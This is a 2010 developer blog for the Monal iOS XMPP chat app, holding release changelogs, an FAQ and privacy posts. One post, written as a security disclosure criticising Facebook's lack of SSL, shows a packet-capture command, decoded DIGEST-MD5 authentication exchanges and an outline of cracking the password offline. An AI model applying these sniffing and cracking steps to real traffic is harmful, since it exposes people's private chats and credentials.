Saturday, December 18, 2010

A shameless plug

I recently released my second iPhone/iPad app. It has absolutely nothing in common with Monal.  The program is called MyNepali and uses sounds and images to teach  young children some basic animal names in the Nepali language.  It is 99 cents. If you are interested, you can find MyNepali here
http://itunes.apple.com/us/app/mynepali/id406911355?mt=8

Tuesday, December 14, 2010

And we're back

I have no idea what happened.  The email account that was used to create this blog was listed among the 1.3 million accounts taken from Gawker hack on Sunday.  While my account password was not there, I did get  locked out of Gmail because of suspicious activity, likely thousands of failed login attempts from all over the world.  I assume this blog was taken down for the same reason. This  was annoying but could have been much worse, I could have been stupid and used the same password for my Gawker account and my email account.

The Gawker hack is one more reminder of  why trusting some third party with your Gmail, Facebook  or corporate login is a bad idea. While push messages are really nice, are you sure that the database that has your username and password is secure?  Do you trust the company making your IM client with all of that info?

Saturday, December 11, 2010

A note on privacy and tracking software

How many people use Monal? A lot. Thousands and thousands of people all over the world in all sorts of random places (Hello, Antarctica!). However, all I know is what the Apple download/upload  counter shows and what people tell me in emails.  Much the same way I have objections to ads in my software, I do not like the "metrics" software and libraries that are out there. Unlike many other iOS apps, Monal does not contain and will never contain user tracking software. Consider this app your refuge from ads, trackers and middle man servers.

Sunday, November 28, 2010

2.0.2 changelog

This is a bug fix update that addresses issues users have raised.  I have tried to have one release roughly every month, there will be no January release.  Unless there is a major issue in this release the next release will be in February.

1. fixed a bug where some people might not show up as online sometimes
2. fixed bug where away was not working
3. added status orbs
4. fixed bug adding accounts
5. several ipad ui improvements
6. SECURITY: fixed possible XSS attack
7. active chats count update properly
8. Misc connectivity bugfixes

Tuesday, November 2, 2010

Always free, no ads, no creepy servers

A lot of people have told me about being willing to see ads to support development. I actually really dislike ads and all the apps that I have used that had ads were slowed down by them. I also notice that certain other IM clients released versions without ads and then pushed updates with them after the user base grew. I find that to be a rather deceptive bait and switch particularly since I know that the ad services collect and use user data --possibly based on your chats-- to present more ads. It is behavior like this, the 3rd party account sign up nonsense and the lack of direct connections that prompted me to write Monal in the first place.

There will always be a free version of Monal, it will always support direct connections and it won't have ads.

Monday, October 18, 2010

2.0.1 bugfixes

I am pushing out a quick bugfix update to fix some issues people have told me about.


1. removes a lock up when user disconnects while chatting
2. added a progress indicator to show when large chats are loaded
3. fixed a compatibility bug with some ejabberd servers
4. fixed failure to load on some devices
5. added timeouts on connection to better detect errors
6. fixed the issue where sometimes the login window spins forever


Monday, October 11, 2010

Jabberd and Monal 2

I am receiving a few reports of issues connecting to some Jabberd servers. I haven't been able to replicate this on any of my test installs. If anyone has access to a server that is not working with Monal and can give me a test account to work with, email me.

Saturday, October 9, 2010

Monal 2.0 is out

The new release is now available for download in the app store. If you encounter any bugs, please email me at monaltest@gmail.com

Monday, October 4, 2010

Monal 2.0 iPad screen dump





Monal 2.0 iphone screen dump

While we are waiting for the new version to be approved, here are final screens for the iphone app's page




Sunday, October 3, 2010

back on track

I hope to have a new build sent to the app store on Monday

Thursday, September 30, 2010

Delayed!

A beta tester just found a rather serious bug that I need to check. I've pulled the binary and the release will be pushed into next week so I can look at this.

Wednesday, September 29, 2010

Monal 1.07 is now 2.0 and other updates

Monal has been submitted to the app store for approval. Don't be alarmed when you see Monal 2.0 show up on your application list.  It is what was 1.07. I had to increase the version number to 2.0 because for some reason the application loader couldn't tell that 1.07 was greater than 1.062 and refused to allow me to upload an "older" version.  It should be approved in a few days. While, this isn't how I wanted 2.0 to be released,  it is the biggest update to the software since it came out and it has been over a year since 1.0, so it's not that bad.

I have also added Monal to the business category in addition to social networking because of the cisco webex connect support.  The minimum iOS version has been changed to 3.1.2 from 3.1.3. Finally,  the application rating has been changed to 17+ since it includes a web browser.

Thursday, September 23, 2010

Monal 1.07 feature complete

Monal 1.07 is feature complete and is about to complete testing. Release candidate 1 was sent out to testers today. If no issues arise this will be the build submitted to the app store.

This is the final changelog of what to expect. In addition to the graphical overhaul, the other major change that will affect many people is support for group chat.

1.07 changelog

This is a major update that significantly changes the front and backends of the program.

1. Stops crash on load on iphone 3g and fixed many other bugs
2. faster start up and much more efficient login code (3-4x faster)
3. fixed bug where chat input box was disabled after viewing logs
4. urls in chat are detected and can be tapped to bring up safari when there is multi tasking or in app when there isn't.
5. Added a logoff button for easy logoff without closing app
6. contacts listed in alphabetical order, own username not shown
7. support for xmpp tunes, option to set status as currently playing ipod song
8. New ipad UI autorotates to all orientations, supports landscape
9. new lighter, faster and more accurate XMPP parsing engine
10. xmpp uses JID for setup
11. UI improvements for consistency
12. new sliding notification when a message is received or song changes
13. status updates are immediately seen
14. added a simple web browser for non multi tasking OSes
15. Icons update correctly when buddy changes it
16. added an active chats tab to access current conversations easily
17. added DNS SRV record discovery. this enables cisco webexconnect support in addition to greater compatibility overall.
18. added support for group chat
19. added support for itunes file transfer

Thursday, September 16, 2010

Cisco Webex connect support

 I can confirm that the next version of the client connects to cisco webex connect XMPP servers.  There are still a few quirks that I intend to iron out, but basic the functionality is working.

Edit 4/13/2011 :
 you can find instructions on the new monal site's  help page for webex

http://monal.im/help/cisco-webex/

Monday, September 13, 2010

DNS service discovery, priorities and Cisco Webex

It's not everyday I learn about something totally new. I learned today that XMPP uses SRV records in the DNS to correctly determine the highest priority server and port to use. I have now added XMPP DNS service discovery. This improves compatibility with servers across the board and in theory it should also enable connections to Cisco WebEx XMPP servers -- something several people have asked about. I will write back with confirmation.

See debug logs below:
Gtalk:


Cisco:



Sunday, September 12, 2010

1.07 changelog so far

Development and testing on 1.07 is almost complete. This is the near final changelog. The one more addition to this will be multi user chat support.


1. Stops crash on load on iphone 3g.
2. faster start up and much more efficient login code (3-4x faster)
3. fixed  bug where chat input box was disabled after viewing logs
4. urls in chat are detected and can be tapped to bring up safari when there is multi tasking or in app when there isn't.
5. Added a logoff button for easy logoff without closing app
6. contacts listed in alphabetical order, own username not shown
7. support for xmpp tunes, option to set status as currently playing ipod song
8. New ipad UI autorotates to all orientations, supports landscape
9. new lighter, faster and more accurate XMPP parsing engine
10. xmpp uses JID for setup
11. UI improvements for consistency
12. new sliding notification when a message is received or  song changes
13. status updates are immediately seen
14. added a simple web browser for non multi tasking OSes
15. Icons update correctly when buddy changes it
16. added an active chats tab to access current conversations easily

Monday, September 6, 2010

Multi user chat

The next release will support joining multi user chats.

Saturday, September 4, 2010

Monal 1.07 Private Beta

I am ready to begin beta testing the next release of Monal.   I am interested in making sure Monal works with as wide a range of XMPP servers as possible.  If you are interested in joining the beta please email monaltest@gmail.com  with the subject :  Monal 1.07 private beta . 


In your email please include the following information:


1. if are you  using gmail, facebook or some other server.
2. if you are using some other server do you know what it is (openfire, ejabberd etc)
3. what device (s) you use iPad, iphone 3g, ipod touch etc.
4. what ios version you use 
5. your device UDID ( http://www.tuaw.com/2008/08/08/iphone-101-find-udid-with-a-single-click/ )
6. what country you are in





Friday, September 3, 2010

In App Browser

 For users of older iPhone and iPads that do not have multi tasking, I have added a simple in-app web browser.  This is under the more menu and takes up no additional resources since it uses the same message rendering engine. Its not safari  but it should let you do other stuff while still receiving messages


Sunday, August 29, 2010

iPads

The next release will have much better iPad support.

Sunday, August 22, 2010

More Changes: Meet The Slider

Monal now has the option to tap into itunes and use a neat little notification system. The black translucent overlay box slides in from the bottom and works like growl on OSX. Here are some preliminary shots. I plan on showing the song art/buddy icon and letting you tap on them to go to the incoming message.






Saturday, August 21, 2010

XMPP Feature list

This page  has been moved to

http://monal.im/topics/features/

    Changes

    I am improving the UI and trying to make it more intuitive while incorporating your feedback. The next release will look and behave  different in a few ways.  Here are some of them
    JIDs:

    Use of sliders instead of alert windows:



    Can run in any orientation on the ipad



    An explicit logout button






    Friday, August 20, 2010

    How to contact me

    If you need to contact me regarding Monal please email monaltest@gmail.com. You can also add me on gtalk or as a contact on your own jabber server.

    Wednesday, August 18, 2010

    More updates

    I've been overhauling the system to make it faster and more stable. It is noticeably better now.  This is the current change log


    1. Stops crash on load on iphone 3g.
    2. faster start up and much more efficient login code (3-4x faster)
    3. fixed  bug where chat input box was disabled after viewing logs
    4. urls in chat are detected and can be tapped to bring up safari
    5. Added a logoff button for easy logoff without closing app
    6. contacts listed in alphabetical order, own username not shown
    7. support for xmpp tunes, option to set status as currently playing ipod song

    Sunday, August 8, 2010

    iPhone 3G crash issue

    I have been testing more heavily on iPhone 3G iOS4 and have discovered the cause of the crash on load issue that many users have described.  It has now been fixed.  Bugs fixed so far for the next release:


    1. Stops crash on load on iphone 3g.
    2. sped up application start to prevent time out (crash)  on load
    3. fixed  bug where input box was disabled after viewing logs

    Saturday, July 31, 2010

    1.062 is in the store

    Use this thread to tell me about any issues you may have, questions or comments. I use this feed back to improve subsequent releases. Thanks.

    Friday, July 23, 2010

    1.062 pushed out

    Because I have been too busy to complete all the features I planned on having in 1.07, I have pushed out 1.062 with many of the bug fixes and user recommendations.  It should be in the app store in a few days. this is the final change log:


    1. removed unnecessaty XMPP commands (chatstates, pings) to reduce CPU/battery load
    2. xmpp keep alive increased to 4 minutes to reduce network/battery usage
    3. fixed bug where there was no vibration or ring when messages arrived
    4. made the idle logout notification only if an account is active
    5. background idle logout notification may be turned off
    6. fixed bug where disabling the account didn't disconnect it
    7. chat log: no duplicate names, names sorted in alphabetical order, own username no longer shown

    Saturday, July 3, 2010

    crashes and 1.07 changes so far

    these are the changes coming in 1.07 so far. I will fix things as i become aware of them.  Some people still report ipad crashes. Please sync your ipads to itunes so Apple sends me the crash log and i can see whats going on. I havent been able to replicate them.  Could someone still experiencing this problem try deleting the app and reinstalling it.


    1. fixed bug where there was no vibration or ring when messages arrived
    2. made the idle logout notification only if an account is active
    3. background idle logout notification may be turned off
    4. xmpp keep alive increased to 4 minutes to reduce network usage

    5. fixed bug where disabling the account didn't disconnect it



    Tuesday, June 22, 2010

    1.06 bugs, IPad and 1.061

    1.06 with multi tasking is on the itunes store. I made a mistake with the compile process and 1.06  will crash on immediately on iPads since they still run OS3. I have pushed out  1.061 which fixes this issue for iPad users.

    Use the comments on this post to tell me about problems you have experienced anything else you might need to ask/tell me.

    Monday, June 14, 2010

    How background works in iOS4

    Background Apps
    iOS4 has several classes of background apps. Unfortunately, IM is not one of those classes. The classes that do exist are for essentially for voip (network socket maintenance), audio (audio processing) and location services (full multi tasking) .  Having run Monal in the background for a few weeks and seen the battery life, I now understand why Apple has done this.  You are always aware of  and interacting in some way with all of the classes of background apps allowed. You are either making a voip call, listening to audio or using the GPS navigation. At no time do any of these background apps run  with the user not aware of it. IM on the other hand is expected to run at all times.  It runs silently in the background, using the cpu ,  keeping a connection open and generally draining the battery. It is entirely possible for someone to run an IM app, not be aware it is running and then begin to wonder why the battery only lasts a couple of hours.  I have seen this happen time and again to android users. Power users may be able to use the task manager to kill processes, but that is unreasonable for a mass market product.

    How Monal Works
    All of that being said, Monal does run in the background and the way it does it should satisfy the needs of most users.  Monal runs in the background for 10 minutes. After 5 minutes of idle time, it will push a notification that only 5 more minutes of background time remain.  After 10 minutes, the program will logout and suspend itself. A suspended program is not a drain on the battery.  If at any point in the 10 minutes you bring Monal back to the foreground, the clock will be reset for a fresh 10.

    When Monal is running in the background, it will push notifications to the user when messages are received.  The user will view/reply to the message and thus continuously reset the 10 minute clock.

    I think the typical user would sign in and  move Monal to the background and do other things. They either send and receive messages  and continuously reset the 10 minute clock or  at 5 minutes are asked to renew it for another 10 minutes by brining Monal the the foreground once.  This prevents the scenario where someone signs in  and forgets to sign out, locks the phone  and then completely drains the battery. 


    What if someone wants to stay signed in while the phone is idle ?
    If you want to remain signed in while not using the phone, move Monal to the foreground before locking the phone. If you do this you will always be signed in and will receive notifications for all messages. When you want to use the phone again you can move it to the background and renew the 10 min lease periodically.

    Thursday, June 3, 2010

    Background apps

    Monal runs in the background now. When you go to another program, it will continue to remain connected using Apple's battery saving background processes. If you receive a message while in the background, you will see a pop up that looks like a push notification with the message. It will also popup a push notification if you have the home screen locked. 

    Monal 1.06 with multi tasking will be released as soon as Apple releases the official SDK (expected to be 
    June 7th )

    1.05 Approved

    Monal 1.05 has been approved and is in the app store. Grab it for your iPad and iPhones

    Sunday, May 30, 2010

    Crazy stuff

    OS4 is a blast to work with and I have gotten it to do some really crazy stuff to have Monal run seamlessly in the background. Hopefully these aren't bugs in the beta and   Apple will allow it.

    Sunday, May 23, 2010

    Final Change log for 1.05

    These are the changes in 1.05. This will be the final 3.x release. This should show up in iTunes soon.  I have already started programming for the multi tasking in 4.x . The next release will be a huge update and will drop as soon as 4.0 is released.


    1.05 changelog

    1. fixed all bugs from crash logs, made some speed improvements
    2. removed the confusing chat logs window edit button
    3. fixed bug where names of users signing in sometimes showed up in other chats
    4. opening conversation shows last 10 not 20 messages (faster load)
    5. the input box now allows multiple line input and expands when tapped on
    6. input box does not delete unsent messages  when tapping outside of the box
    7. Graphical  emoticons in chat
    8. added a basic  iPad interface
    9. Added button to quickly clear all conversation logs

    Saturday, May 22, 2010

    Ipads

    The iPhone Monal app already works on the iPad and I see from the crash logs that there are quite a few of you using it. The next release will be a universal application that takes advantage of the added space. The native iPad version doesnt look much different right now, I'm still learning all the new features.  It's a start.

    Emoticons

    Sorry it too so long.

    Multi tasking.

    Monal runs in the background for a while on OS4. You should be able to switch back and forth between chat and other programs.

    1.05 in the works

    1.05 moving along well. Here is the change log so far for the next release.


    1.05 changelog

    1. fixed all bugs from crash logs
    2. removed the confusing chat log edit button
    3. fixed bug where names of users signing in sometimes showed up in other chats
    4. opening conversation shows last 10 not 20 messages (faster load)
    5. the input box now allows multiple line input and expands when tapped on
    6. input box does not delete unsent messages  when tapping outside of the box

    Friday, May 21, 2010

    Happy Birthday Monal

    It's been a whole year since the initial 1.0 release of  Monal (then called SworIM) was pushed out to the app store.  Thank you  all for the feedback, testing and generally helping me improve the software.
    It's come a long way in the past year and is going to keep improving in 2010. 
    A year ago:


    Today:



    Tuesday, May 4, 2010

    Iphone OS4 And More Server Support

    I can confirm that Monal 1.04 works fine in OS4.  While it doesn't fall under the class of programs allowed to multi task, I am planning on adding fast switch and  task completion which should hopefully allow you to switch between programs quickly without losing your connection.

    Work on Monal 1.05 will resume this week. Before OS4 comes out I want to get another version out that is focused on bug fixes and  server compatibility.  If you are aware of public servers that do not work, let me know in the comments section. If it is a private server and you can give me access to test, contact me at anurodhp@SPAM.gmail.com (remove the spam) with instructions. I will make sure it works in the next release.

    Tuesday, February 16, 2010

    1.04 getting pushed out

    I am about to push out 1.04 here is the final changelog



    1.04 changelog

    1. added support for SSL on port 5222 (New style) (XMPP)
    2. added support for digest md5 authentication mechanism (XMPP)
    3. added support facebook chat (XMPP)
    4. added basic support for AOL Instant Messenger (AIM)
    5. uses the contact's full name from vCard if available instead of username (XMPP)
    6. opening a conversation shows the last 20 messages not 30. speeds up loading
    7. added network activity indicator on top bar
    8. fixed bug where some offline messages were being ignored
    9. fixed several crashing bugs
    10. fixed random disconnect/reconnect  issue
    11. modified message theme to have less image loading and better space use
    12. tested with jabberd2 servers

    There is  a new screen shot to go along with this of course



    Monday, February 15, 2010

    How weak is Facebook's XMPP security?

    As I mentioned earlier, Facebook does not use SSL on their new XMPP server. All of their security is based on an algorithm called Digest-Md5. As the name says this is based on the popular MD5 hashing algorithm that is no longer considered secure.  From Facebook:


    No. At this time, Facebook Chat does not support SSL.
    Does Facebook Chat use plaintext authentication?
    No. Facebook Chat uses DIGEST-MD5 during authentication.

    Are my Chat messages encrypted?
    No. However, authentication information is secured using DIGEST-MD5.




    Regarding MD5: 
    US-CERT, the US Department of Homeland Security's Computer Emergency Readiness Team, says:
    • "Do not use the MD5 algorithm"
      "Software developers, Certification Authorities, website owners, and users should avoid using the MD5 algorithm in any capacity. As previous research has demonstrated, it should be considered cryptographically broken and unsuitable for further use."
    • "Scrutinize SSL certificates signed by certificates using the MD5 algorithm"
      "Users may wish to manually analyze the properties of web site certificates (...) Certificates listed as md5RSA or similar are affected. Such certificates that include strange or suspicious fields or other anomalies may be fraudulent. Because there are no reliable signs of tampering it must be noted that this workaround is error-prone and impractical for most users."

    No SSL:
    What happens when you don't use SSL for your chat? People sniffing the network can see what you are saying.  This is very simple to do.
    Either use tcpdump  from the command line (works on Mac,linux etc) or grab a packet sniffer like wireshark . I would recommend wireshark anyway because it makes the next part even easier.  If you used tcp dump, this you would have something like this

    sudo tcpdump -i en0  -s500 -w ~/Desktop/DumpFile01.pcap -vv 


    Lets say you have a network dump somehow and you open up wire shark. set it to filter jabber and you will start to see something like this. I've highlighted a message packet so you can see that I was able to read this message someone sent.












    Now everything sent on the network can be read and the password "security" is based on MD5 right? behold a captured password sequence:
    cmVhbG09ImNoYXQuZmFjZWJvb2suY29tIixub25jZT0iNjdFRDdCQTg3NjgwN0MyOEIzQUI2RkE2MzRGQTE2MDUiLHFvcD0iYXV0aCIsY2hhcnNldD11dGYtOCxhbGdvcml0aG09bWQ1LXNlc3M=

    this decodes from  base64 to:
    realm="chat.facebook.com",nonce="67ED7BA876807C28B3AB6FA634FA1605",qop="auth",charset=utf-8,algorithm=md5-sess


    Excellent we have some information. The client replied with:

    dXNlcm5hbWU9InNvbWVvbmUiLHJlYWxtPSJjaGF0LmZhY2Vib29rLmNvbSIsbm9uY2U9IjY3RUQ3QkE4NzY4MDdDMjhCM0FCNkZBNjM0RkExNjA1Iixjbm9uY2U9ImQzM2M4ODYyMTI2NjI2NTYzNzcxMDk3YjcwIixuYz0wMDAwMDAwMSxxb3A9YXV0aCxkaWdlc3QtdXJpPSJ4bXBwL2NoYXQuZmFjZWJvb2suY29tIixyZXNwb25zZT01MjBhMjdiOWRjOTE5NWRjMTJjNTVjZGY4MTUyOWI2MixjaGFyc2V0PXV0Zi04


    this decodes from base64 to:


    username="someone",realm="chat.facebook.com",nonce="67ED7BA876807C28B3AB6FA634FA1605",cnonce="d33c8862126626563771097b70",nc=00000001,qop=auth,digest-uri="xmpp/chat.facebook.com",response=520a27b9dc9195dc12c55cdf81529b62,charset=utf-8


    Nonce and cnonce are used to calculate the encrypted "response". This is where the password is. nonce and cnonce are really there for one time use to prevent a replay attack.


    What do we know now?


    password hash: 520a27b9dc9195dc12c55cdf81529b62
    nonce: 67ED7BA876807C28B3AB6FA634FA1605
    cnonc: d33c8862126626563771097b70
    qpop: auth
    nc: 00000001




    password hash is based on a series of md5 hashes:
    first hash (X) is of username:realm:password
    we know this to be = someone:chat.facebook.com: (password)
    Next hash (Y) is X:nonce:cnonce
    we know this to be: (password hash): 67ED7BA876807C28B3AB6FA634FA1605: d33c8862126626563771097b70


    Next hash (Z) fully known to be of AUTHENTICATE:xmpp/chat.facebook.com

    Final hash is the response value, which is also known and we know it is in the form:
    Y:nonce:nc:cnonce:qop:Z

    we fully know Z, nonce, cnonce, qpop,  nc

    The only thing missing here is Y, which is dependent on X,  which is just an unsalted  MD5 hash based on a password. How would you crack this? There are a few ways,  but the simplest in most cases is just to use rainbow tables  but compute the hash 2 times more using the other parts of the string from above and  see if it matches the response. I'm going to stop the explanation here for obvious reasons.  More info on rainbow tables here:

    http://www.freerainbowtables.com/
    http://en.wikipedia.org/wiki/Rainbow_table

    There is also the possibility of finding  another string that will create the same password hash. This is called a hash collision. In this case, the attacker doesn't even need to know the actual password. They can just use this other string in its place and access an account just the same.

    If the person is using a short or insecure password a dedicated  attacker (identity thieves, spammers etc) should have it cracked easily and since the packet was captured, the  attacker can test against the password as much as he likes on his own machine.

    Sunday, February 14, 2010

    New optimized space icon

    I've implemented the full stockholm theme now, each message  from a user does not load the icon and colored bar all over again. This leads to dramatically faster loading of chat windows and much better use of space.  Compare below to what we had before.


    The biggest improvement is in landscape mode with the keyboard on. You can now see up to 5 lines above the keyboard and the input box. 


    old landscape in 1.03

    1.04 will support Digest-Md5 and Facebook

    I have added Digest-Md5 support to Monal and it will be in 1.04 .  I added this because it is what Facebook uses.  I will have a Facebook preset in Monal with all of the server settings in 1.04. Hopefully facebook will fix the lack of SSL by then as well.  It also looks like I need to support aliases. Facebook chat is unusable and  confusing  without it.

    Saturday, February 13, 2010

    Monal supports AIM

    As I have said from the beginning, Monal will be a multi protocol instant messenger client. Something to look for in 1.04




    Friday, February 12, 2010

    Monal mentioned on Cnet podcast

    There is a mention of Monal and the Facebook XMPP security hole on today's Buzz Out Loud podcast. You can  hear it at 35:45 mark.
    Listen to it here:
    http://www.cnet.com/8301-19709_1-10452774-10.html

     People have also voted up the SSL bug on the Facebook developers site.

    Warning on Facebook XMPP

    I just finished looking at the new Facebook XMPP server.  I strongly recommend against using it. 

    This is probably one of the worst implementations ever. The chat does not use SSL encryption unlike almost every other server.  Better yet, they decided to use an authentication scheme called Digest-MD5, which aside from having varying implementations and compatibility problems was  DEPRECATED by the IETF in January 2009 ( https://tools.ietf.org/html/draft-ietf-sasl-digest-to-historic ) because it  can be cracked. Facebook has just opened up a gaping hole in their security.  Someone at facebook needs to be fired.

    The link above explains many of the problems with Digest-MD5 but this is the best one.
      8.  The cryptographic primitives in DIGEST-MD5 are not up to today's
          standards, in particular:

          A.  The MD5 hash is sufficiently weak to make a brute force
              attack on DIGEST-MD5 easy with common hardware.

          B.  Using the RC4 algorithm for the security layer without
              discarding the initial key stream output is prone to attack.





    Thursday, February 11, 2010

    Facebook and 1.03

    Monal 1.03 has been released into the wild. Grab it from itunes.  As mentioned earlier, this version has the improved landscape and support for self signed SSL certificates.

    I just found out that Facebook added support for XMPP chat.  Oddly, it uses the deprecated Digest-Md5 authentication and no SSL.  Because digest-md5 was deprecated and sasl plain  over SSL was the defacto standard, I never bothered implementing it.  I guess I have to do it now.

    Wednesday, February 10, 2010

    Improving SSL in 1.04 (works on 5222)

    This is probably one of the most requested features.  SSL now works on port 5222 using the "new style" SSL connection that uses the StartTLS command.  It isn't 100% reliable yet, which is why it wasn't pushed out in yesterday's 1.03 but  it will definitely be in 1.04.  This combined with support the support for unsigned SSL certificates already in 1.03 should satisfy almost everyone.


    Tuesday, February 9, 2010

    1.03 submitted

    Its only been a few days since 1.02 was released, but I think I've gotten enough feed back to push out a quick 1.03 update. The improved landscape and SSL support should make the application much more usable and I saw no reason to sit on it. Expect 1.03 by the end of the week.

     The full changelog below. I am also going to update the FAQ to clarify that 1.03 supports self signed certificates.


    1. Self signed SSL certificates now work
    2. removed non public API used
    3. improved xmpp support
    4. message send failure is treated as a disconnection and handled automatically
    5. navigation bar and status bar now disappear in landscape mode
    6. scroll to the newest message when first going into a chat now
    7. adjusted brightness of icon so it isnt so dark
        

    Monday, February 8, 2010

    Improving SSL in 1.03

    There has been some criticism on the itunes store about the lack of support for self signed certificates when using SSL.  1.03 now supports self signed certificates.

    Saturday, February 6, 2010

    Improving landscape in 1.03

    A user pointed out to me that the old landscape mode had lots of wasted space at the top.  In 1.03, when the phone goes to landscape, the navigation bar and status bar disappear. This recovers that space and when using a keyboard, much more can be seen on top.

    Friday, February 5, 2010

    Monal 1.02 Approved

    You can grab the newest version on the iTunes store now.

    Don't forget to rate in itunes and Digg!

    Tuesday, February 2, 2010

    Monal 1.02/1.03 FAQ

    Here is a quick list of things i think people should know when trouble shooting the next release. If there is anything else, post a comment and I will try to address it. 

    What servers have you tested this with?

    Monal 1.02 has been tested mostly  with google talk, openfire and ejabberd.
    Openfire has been very heavily tested on multiple versions all the way up to 3.6.4.

    ejabberd was tested on  jabbim.com .

    What SSL settings work?


    At the moment only old style SSL works. This means if you are going to use SSL it probably should be on port 5223.  If you connect on 5222 with SSL  it will not work.

    What server settings work?


    The server must support SASL Plain authentication. This is the standard and should not be a problem for most people.  Connections to port 5222 should not have SSL enabled.  To use SSL you need to use port 5223. Not all servers support SSL on port 5223 if your server does not, you can either use 5222 without SSL if you are ok with that.



    What if the certificate on the server does not match the server address?
    Monal does not check to make sure that the certificate name and the server name are the same. SSL connections to these servers  should work fine.

    What if I have a self signed certificate?
    Edit: the answer below applies for 1.02 only. 1.03 supports self signed certificates. 


    Monal does not support servers with self signed certificates right now.  You  cannot use SSL to connect to a  a server with self signed certificates.

    Why does the program slow down when I open it the first time/ connect to a server the first time.

    Monal tries to download all the buddy icons after loading the list of people online. This takes up resources and might slow things down  depending on how many buddies you have, how fast your connection is  and how big your icons are.

    Why does the chat  screen flash when I load a new conversation.


    Monal basically uses a web view (safari) to show the chat window in all its glory. The flash is safari loading the page. This only happens when you first start a chat

    How do I delete chat history?


    Go to the chat logs and swipe to delete all history with that user or click "Edit" on the upper right to select items and delete them.   If you want to delete all logs, delete the log that is an entry for your own user. This will delete every message you have received or sent.

    Sunday, January 31, 2010

    New Icon

    With a new name, Monal also has a new icon also designed by Ayush Pokharel.

    Saturday, January 30, 2010

    Adium themes are in

    As luck would have it, there was a critical bug in the version of Monal submitted to the App store and  I pulled it before it was approved.  While it was in the approval queue i managed to get the Adium themes working correctly so it will be in 1.02.

    appending the following to the change log:
    21. New faster and better looking message display that is compatible with Adium themes.